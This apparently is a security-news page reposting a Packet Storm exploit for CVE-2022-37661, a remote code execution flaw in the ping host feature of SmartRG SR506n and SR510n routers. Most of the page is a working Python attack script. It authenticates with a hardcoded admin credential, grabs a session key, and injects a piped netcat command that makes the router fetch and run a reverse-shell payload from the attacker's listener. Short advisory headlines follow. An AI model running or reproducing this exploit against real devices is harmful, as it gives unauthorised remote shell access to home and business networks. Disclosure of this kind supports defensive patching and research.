Security
Headlines
HeadlinesLatestCVEs

Headline

SmartRG Router SR510n 2.6.13 Remote Code Execution

SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.

Packet Storm
#vulnerability#rce#auth
# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host =3D "http://192.168.1.1"authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"lhost =3D "lo"lport =3D 80payload_port =3D 81def main():    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)    send_payload(f"|nc {lhost} {payload_port}|sh")    print("done.. check shell")def get_session():    url =3D router_host + "/admin/ping.html"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    r =3D requests.get(url, headers=3Dheaders).text    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")    s =3D ""    while r[i] !=3D "'":        s =3D s + r[i]        i =3D i + 1    return sdef send_payload(payload):    print(payload)    url =3D router_host + "/admin/pingHost.cmd"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=: get_session()}    requests.get(url, headers=3Dheaders, params=3Dparams).textmain()

Related news

CVE-2022-37661: SmartRG Router 2.6.13 Remote Code Execution ≈ Packet Storm

SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.

SmartRG Router 2.6.13 Remote Code Execution

SmartRG Router version 2.6.13 suffers from a remote code execution vulnerability.

Packet Storm: Latest News

Pyload Remote Code Execution